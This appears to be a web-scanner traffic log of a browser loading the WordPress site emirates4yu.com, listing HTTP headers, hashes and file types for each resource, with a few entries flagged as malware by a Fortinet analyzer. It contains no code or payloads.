www.emirates4yu.com/
35.190.203.220301 Moved Permanently 162 B IP 35.190.203.220:0
File type HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Hash 4f8e702cc244ec5d4de32740c0ecbd97
3adb1f02d5b6054de0046e367c1d687b6cdf7aff
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: www.emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 25 Nov 2022 12:01:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20
Location: http://emirates4yu.com/
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 7c60904d097cde276e4e5632cef1b9f1
4f805026462589345d85e8df2d18eafba6237504
12af026999398f4976749e320667d43da3f99b7a2e8254aca7a410a964a106aa
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "12AF026999398F4976749E320667D43DA3F99B7A2E8254ACA7A410A964A106AA"
Last-Modified: Thu, 24 Nov 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4514
Expires: Fri, 25 Nov 2022 13:17:13 GMT
Date: Fri, 25 Nov 2022 12:01:59 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash af40a2fcf8debb90c3608002da6c907a
3c75d6c0b557a3bd8d5db50155b8d896e852c145
555617a51ee3077552545a29a3baf0b43e8a82367e4c08110ee480ebedc8b523
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4942
Cache-Control: max-age=85894
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:01:59 GMT
Etag: "637f47ef-1d7"
Expires: Sat, 26 Nov 2022 11:53:33 GMT
Last-Modified: Thu, 24 Nov 2022 10:31:11 GMT
Server: ECS (ska/F70F)
X-Cache: HIT
Content-Length: 471
firefox.settings.services.mozilla.com/v1/
34.102.187.140200 OK 939 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 567df7db606cf5d0871aa5bc9311b6da
4263faac7cbab2fcaf6661911dcad5091c06be17
e9650e1fdc46fc8678708ddcc37ab369c7a6d50489a004be896f20c7a3a644b0
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Backoff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Fri, 25 Nov 2022 11:19:06 GMT
cache-control: public,max-age=3600
content-type: application/json
age: 2573
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 260e9998c20d831b66f1029c8f47aac9
716d630f647c54dc69a7f9c63a6cac294b3df7f7
c9951a909f354174f0075a01c01c3c3aa6960983040e328bfbbbea81aeb405c2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12785
Expires: Fri, 25 Nov 2022 15:35:04 GMT
Date: Fri, 25 Nov 2022 12:01:59 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
34.160.144.191200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 9ebddc2b260d081ebbefee47c037cb28
492bad62a7ca6a74738921ef5ae6f0be5edebf39
74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: larp3dxMV6MzEiRKlZ4eHNw3BHMI44a+svBhZJPogZgP1atigAHq6/Cxr/CFyRKdkRLbA92b5iY=
x-amz-request-id: 36XJTH7YFCFD5TYP
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 25 Nov 2022 11:43:49 GMT
age: 1090
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
emirates4yu.com/
35.190.203.220301 Moved Permanently 162 B IP 35.190.203.220:0
File type HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Hash 4f8e702cc244ec5d4de32740c0ecbd97
3adb1f02d5b6054de0046e367c1d687b6cdf7aff
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 25 Nov 2022 12:01:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20
Location: https://emirates4yu.com/
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
emirates4yu.com/
35.190.203.220302 Found 0 B IP 35.190.203.220:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 302 Found
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: text/html; charset=UTF-8
content-length: 0
location: https://emirates4yu.com/fr/
x-redirect-by: Polylang
x-powered-by: WP Engine
x-cacheable: non200
cache-control: max-age=600, must-revalidate
x-cache: HIT: 3
x-cache-group: normal
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 280 B IP 93.184.220.29:0
Hash a8975f19de3c977c08e72e5f476b0987
71cc460e3bf3cbfe0c92424f049e59488ad3bc7a
a4342ea09f474dbdd8c0d11264d92082bde2fc0fbbc3e0169ac39113cbd6700a
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6593
Cache-Control: max-age=107001
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Etag: "637f93f0-118"
Expires: Sat, 26 Nov 2022 17:45:21 GMT
Last-Modified: Thu, 24 Nov 2022 15:55:28 GMT
Server: ECS (ska/F70F)
X-Cache: HIT
Content-Length: 280
emirates4yu.com/wp-content/uploads/bb-plugin/cache/1-1-circle.png
35.190.203.220200 OK 674 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/1-1-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash 0cd3dc69618beaeeac3422cc20824ff5
6e6d21be94f4819e9df4e6933651e0317f507cfe
f658cf1ce5db5b6795a01fdde63e23c7e9c688b3a4f89e11e5b92a479b7d6c73
GET /wp-content/uploads/bb-plugin/cache/1-1-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 674
last-modified: Wed, 19 Dec 2018 10:51:42 GMT
etag: "5c1a22be-2a2"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/2-circle.png
35.190.203.220200 OK 715 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/2-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash 8c493838b5bbc86007794df2a4b4a619
32c6d3bb75bb4c0ccee5377097ad86a65cd287b9
75a19641e8ccee31f8ffc1bd5a431a91393d1b0675d19faaad35f68d6ea5e7d1
GET /wp-content/uploads/bb-plugin/cache/2-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 715
last-modified: Wed, 19 Dec 2018 10:53:27 GMT
etag: "5c1a2327-2cb"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/3-circle.png
35.190.203.220200 OK 706 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/3-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash ba9672b94bb15f9c1f8e1c28e9798f9e
9543f40a463a9891f46718effcb188ed92d7d7f0
76900c71358e3fc83a7c4961ef39ad157b859aa7333c99305fab7d31deecfe74
GET /wp-content/uploads/bb-plugin/cache/3-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 706
last-modified: Wed, 19 Dec 2018 10:53:47 GMT
etag: "5c1a233b-2c2"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/4-circle.png
35.190.203.220200 OK 727 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/4-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash 7fc3c2bdcd10d6aa163d7af30b91316a
c60e7769afa176c9a9911ae48f441c8f8c6edf9f
21a3cd5d864cd9120f3e31b899505235d407d91153c538233ebe3c0b7f7fd35e
GET /wp-content/uploads/bb-plugin/cache/4-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 727
last-modified: Wed, 19 Dec 2018 10:53:58 GMT
etag: "5c1a2346-2d7"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash b44543de9922ec7d97f2e0be1865553e
caef856450efd75de0cfae9402903b1f4bd6de4c
d251377b4bc11c32a847ce4dc5dfda92e56031617f5b3eeea54fdcd0945b3eb7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.3
35.190.203.220200 OK 15 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (20619)
Hash f03ae17cede9c16960e7046955b914ea
0c611bf539d15b368c1225635508990f5a74804b
37127df2343e14dbb7e622e6c9482834f87324a46669f97e1975834fe3adabd1
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/jetpack/css/jetpack.css?ver=9.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 03 Jun 2021 12:08:13 GMT
etag: W/"60b8c62d-12cc3"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/banner-gold-light.png
35.190.203.220200 OK 30 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/banner-gold-light.png
IP 35.190.203.220:0
File type PNG image data, 400 x 84, 8-bit/color RGBA, non-interlaced\012- data
Hash caa8ee67081ed07e562b6e5b22380425
145cac53a736fd95e074c9cfa87597a480f83fb1
2a3da1296e1f7781983fec34a54669aaa19313fc439080b918aa0a2d40d964d2
GET /wp-content/uploads/2018/12/banner-gold-light.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 30506
last-modified: Tue, 25 Dec 2018 18:21:40 GMT
etag: "5c227534-772a"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/white-logo.png
35.190.203.220200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/white-logo.png
IP 35.190.203.220:0
File type PNG image data, 400 x 86, 8-bit/color RGBA, non-interlaced\012- data
Hash 11c65505119bfe664f3a7d0087bf9e36
846cb888e06f0a8a11111c1abb89f408032d608d
1d65505cafcf66621bdcca0bc57c63a1a84e0abc9079bc771bdbc4b5c74337ee
GET /wp-content/uploads/2018/12/white-logo.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 11248
last-modified: Sun, 23 Dec 2018 23:01:17 GMT
etag: "5c2013bd-2bf0"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/5-circle.png
35.190.203.220200 OK 692 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/5-circle.png
IP 35.190.203.220:0
File type PNG image data, 90 x 90, 4-bit colormap, non-interlaced\012- data
Hash b895bad7c6e89b3434b1a9409ee6c58f
04d3ee358a33b368f11bf6ef4ec482c5d55f1340
c862ecc59488c9e62e134c457cfb62d6193d3385884f15245a1e52c0ea91b98c
GET /wp-content/uploads/bb-plugin/cache/5-circle.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 692
last-modified: Wed, 19 Dec 2018 10:54:21 GMT
etag: "5c1a235d-2b4"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-6.jpg
35.190.203.220200 OK 12 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-6.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash aaa74c4b42cea787e5794031d83a315e
af52e3a094148964cf01f2cac7a10c4e2f6a8805
def10b8a630c6dc45cd66abcf423389e99cbae05c05e95d01bd78258501146fd
GET /wp-content/uploads/2017/11/top-logo-6.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 12348
last-modified: Tue, 21 Nov 2017 10:37:03 GMT
etag: "5a1401cf-303c"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/why2-portrait.jpg
35.190.203.220200 OK 25 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/why2-portrait.jpg
IP 35.190.203.220:0
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 378x540, components 3\012- data
Hash a23a95b5e39a9e24cbdbbc226975fdc9
d25340850db44e776d8b9dcb67ba25a92caa7516
3ab332270a5f1126fe473a3a04566907a45160bb95db3a817fc9b9c5881375e1
GET /wp-content/uploads/bb-plugin/cache/why2-portrait.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 25151
last-modified: Mon, 07 Nov 2022 16:42:38 GMT
etag: "6369357e-623f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-5.jpg
35.190.203.220200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-5.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 6bb7e6d9c89a0e4ed3ebac4571087a36
5837fd83b1f9aa38f21196f04d65492dc4d9c69c
42fd34a6a439989a8f0ce40266b44bd344498f8ab3a3a254d6c0e772e50afef2
GET /wp-content/uploads/2017/11/top-logo-5.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 10577
last-modified: Tue, 21 Nov 2017 10:37:00 GMT
etag: "5a1401cc-2951"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-4.jpg
35.190.203.220200 OK 4.5 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-4.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 7da494776a625a64414e3d8ce4ff2380
e267f27db187c1207751ca267f2ce49825176f64
33f55957a37c6b1f6b8e47610e835681013a11dcd07736bbd992782df142965a
GET /wp-content/uploads/2017/11/top-logo-4.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 4502
last-modified: Tue, 21 Nov 2017 10:36:58 GMT
etag: "5a1401ca-1196"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-3.jpg
35.190.203.220200 OK 10 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-3.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash cec408ad1ab6fab8b5181e86b72da903
ff2ec730380e476f7b9138269cf2906701d32126
a6ceb33967270e90efcbb0e63382e6c8fccda48565f81fc8b109adfc63c45a21
GET /wp-content/uploads/2017/11/top-logo-3.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 9958
last-modified: Tue, 21 Nov 2017 10:36:56 GMT
etag: "5a1401c8-26e6"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-12.jpg
35.190.203.220200 OK 8.6 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-12.jpg
IP 35.190.203.220:0
